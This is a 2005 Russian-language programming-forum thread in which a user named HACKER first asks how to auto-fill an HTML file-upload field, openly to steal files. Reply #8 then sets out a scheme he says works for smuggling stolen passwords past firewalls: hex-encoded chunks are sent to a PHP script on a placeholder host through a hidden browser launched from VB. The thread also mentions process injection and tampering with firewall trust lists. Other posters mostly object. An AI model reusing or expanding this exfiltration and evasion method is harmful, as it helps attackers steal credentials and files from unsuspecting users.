Visual Basic, .NET, ASP, VBScript
 

   
   
     

Форум - ASP и VBScript

Страница: 1 |

 

  Вопрос: Как заполнить в хтмл поле типа file Добавлено: 21.06.05 03:26  

Автор вопроса:  HACKER
Есть хтмл страница:

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#FFFFFF">
<form action="upload.php" method="post" ENCTYPE="multipart/form-data">
   File to upload:<input type="file" size=40 name="file"><br>
   <input type="hidden" name="MAX_FILE_SIZE" value="100000">
   <input type="submit" value="upload">
   </form>
</body>
</html>


И нужно как то прямо при загрузки страницы вписать что-то в <input type="file" чё не пробовал не получается. Думаю тут надо использовать JS or VBS... Есть предложения?

Ответить

  Ответы Всего ответов: 14  

Номер ответа: 1
Автор ответа:
 Sharp


Лидер форума

ICQ: 216865379 

Вопросов: 106
Ответов: 9979
 Web-сайт: sharpc.livejournal.com
 Профиль | | #1
Добавлено: 21.06.05 11:22
Ты не должен такого хотеть, поскольку согласно твоей логике, тогда любая веб-страница может стырить у тебя любой файл.

Ответить

Номер ответа: 2
Автор ответа:
 HACKER


 

Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #2 Добавлено: 21.06.05 21:07
так поэтому и хочу :)

Ответить

Номер ответа: 3
Автор ответа:
 HACKER


 

Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #3 Добавлено: 21.06.05 21:13
Может есть предложение как то программно? Т.е. через VB? Тут советовали COM технологию поучить, мол IE можно через COM заставить сделать многое, но браузеров то много и далеко не все на IE сидят.

Ответить

Номер ответа: 4
Автор ответа:
 Sharp


Лидер форума

ICQ: 216865379 

Вопросов: 106
Ответов: 9979
 Web-сайт: sharpc.livejournal.com
 Профиль | | #4
Добавлено: 21.06.05 21:33
Невозможно, если бы было возможно, давно бы пропатчили.

Ответить

Номер ответа: 5
Автор ответа:
 HACKER


 

Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #5 Добавлено: 21.06.05 22:53
Ну "невозможно" - такого не бывает :) Скорее сложно... :) Например есть сырс проги по определению содержимого всех текстовых окошек в IE. Т.е. прочитать то возможно, почему записать невозможно?

Ответить

Номер ответа: 6
Автор ответа:
 Sharp


Лидер форума

ICQ: 216865379 

Вопросов: 106
Ответов: 9979
 Web-сайт: sharpc.livejournal.com
 Профиль | | #6
Добавлено: 22.06.05 16:11
Зачем чесать ухо пяткой? Если впариваешь трой или тыришь файлы, делай это через свежие эксплоиты. Через DOM это сделать невозможно.

Ответить

Номер ответа: 7
Автор ответа:
 DaSharm



ICQ: 780477 

Вопросов: 72
Ответов: 1297
 Web-сайт: dasharm.com
 Профиль | | #7
Добавлено: 22.06.05 18:31
невозможно, FILE сам по себе заполнен быть не может, это я ещё когда-то в руководстве по ПХП прочитал.

Ответить

Номер ответа: 8
Автор ответа:
 HACKER


 

Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #8 Добавлено: 22.06.05 19:36
А может... или..не.. мля :( Вообще всё сложно оказалось, почитав там статьи всякие, много чё вроде полезного, но все они на сегодняшний день не актуальны, разве что эксплоиты самые новые, и то там тоже всё довольно глухо. Я пробовал разными способами, и только один более мение прокатил, он же самый простой... Пробовал вот что:

Прописывать себя у фаервола в списки доверенных. Но далеко не у всех фаерволов лежат данные просто так на виду, и отредактировать их не получалось. А даже у тех котрых получалось, оказалось что фаерволы держат контрольные суммы размера программы, так что нечго не получилось, прописать себя не удалось.

Внедрятся в другой (доверенный фаерволом) (как делал DaSharm в своём FireFucker...)процесс, на ходу когда он работает... это очень сложно, нескажу что у меня получилось, скажу то что новые фаерволы контролируют размер процесса, и когда внедряемся в другой то он блокирует всё приложение...

С этой фишкой что файл со страницы отправить тоже нефига...

Думал у фаерволов есть некоторые доверенные проги по умолчание (ftp.exe telnet,exe)... нет, у нормальных фаеров нет, все всё переспрашивают у пользователя...

И нашёлся только 1 выход, оооочень медленный, неудобный, тормозящий комп... НО РАБОЧИЙ! И не один фаер не видит, я врядли когда-то выйдет такой который увидит... Вообще тема для обсуждения плохая, т.к. это не тот форум, я конечно всё понимаю... Просто в краце опишу суть, кто в танке - поймёт...

Берём файл, кодируем его в HEX... В итоге получаем строку "FA FF 00 итд..." Это строка ровно в 2 раза больше оригинального файла. Далее пишем маленький пхп скрипт, которому данные передаются в переменной в строке адреса (URL) и он эти данные сохраняет на сервак... Т.е. "http://site.com/script.php?file=имя_файла&text=закодированные_в_HEX_данне" При чём скрипт при повторном запросе, файл не переписует а дописует в конец... Разбиваем text (закодированные данные) примерно по 1000 символов, формируем URL и открываем его браузером, типа Shell url$ & text$, vbHide... А скрипт по окончание отправки данных изменит <title> ... Вот мы откроем браузер и будет ждать пока не появится окно с определённым заголовком, как появилось - убили браузер, и передли слейдущий пакет данные (слейдущие 1000 символов)... В итоге много паролей+много файлов с паролями от разных программ, архивируем винраром, текст сжимается очень хорошо, у меня полученный файл не привышает 10 кб, переводя в hex получается 20 кб, это примерно 20 запросов, т.е. 20 раз открыть и убить браузер + паузы чтоб не сильно комп грузить, вообщем исходный файл в 10 кб, отправляет 2-4 минуты... смотря какой инет... Зато работает 100% Некоторые фаеры для браузеров которые открылись на 3128 порт даже лог не пишут! неговоря о том что перехватывать итп...

Ну как? Можт ещё кто-то что-то посоветует, только что-то такое что действительно реально на текущий момент.

Ответить

Номер ответа: 9
Автор ответа:
 HACKER


 

Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #9 Добавлено: 23.06.05 17:15
эээээ никто не врубился или все проигнорировали?

Ответить

Номер ответа: 10
Автор ответа:
 Sharp


Лидер форума

ICQ: 216865379 

Вопросов: 106
Ответов: 9979
 Web-сайт: sharpc.livejournal.com
 Профиль | | #10
Добавлено: 23.06.05 21:48
Не занимайся глупостями, пиши нормальные программы

Ответить

Номер ответа: 11
Автор ответа:
 HACKER


 

Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #11 Добавлено: 23.06.05 22:43
А я и нормальные пишу, и не нормальные... :)

Ответить

Номер ответа: 12
Автор ответа:
 popovius



ICQ: 225692610 

Вопросов: 9
Ответов: 15
 Web-сайт: dwindex.com
 Профиль | | #12
Добавлено: 20.12.05 14:00
молодец!
наш человек. Скажу одну интересную вещь.
Миранда %-)))

Ответить

Номер ответа: 13
Автор ответа:
 Александр



Разработчик Offline Client

ICQ: 204034 

Вопросов: 106
Ответов: 1919
 Профиль | | #13 Добавлено: 20.12.05 17:10
Хм.. popovius.. Ты когда мне заплатишь? Уже долго жду..

Ответить

Номер ответа: 14
Автор ответа:
 HACKER


 

Разработчик Offline Client

Вопросов: 236
Ответов: 8362
 Профиль | | #14 Добавлено: 22.12.05 21:50
да ацтой это, в 3 ответе я про COM говорил, это прикольней чуть, я уже давно реализовывал, на форуме ещё тема была, непомню как называется, искать влом... и это ацтой :) внедрение в АП рулит :))) а ещё хочу с 0-колечком попробовать :) влом в асме копаться да и времени ща мало... Гы, а вообще ты архиолог, теме всего-то пол года, чё бы не продолжить, да? :)

Ответить

Страница: 1 |

Поиск по форуму



© Copyright 2002-2011 VBNet.RU | Пишите нам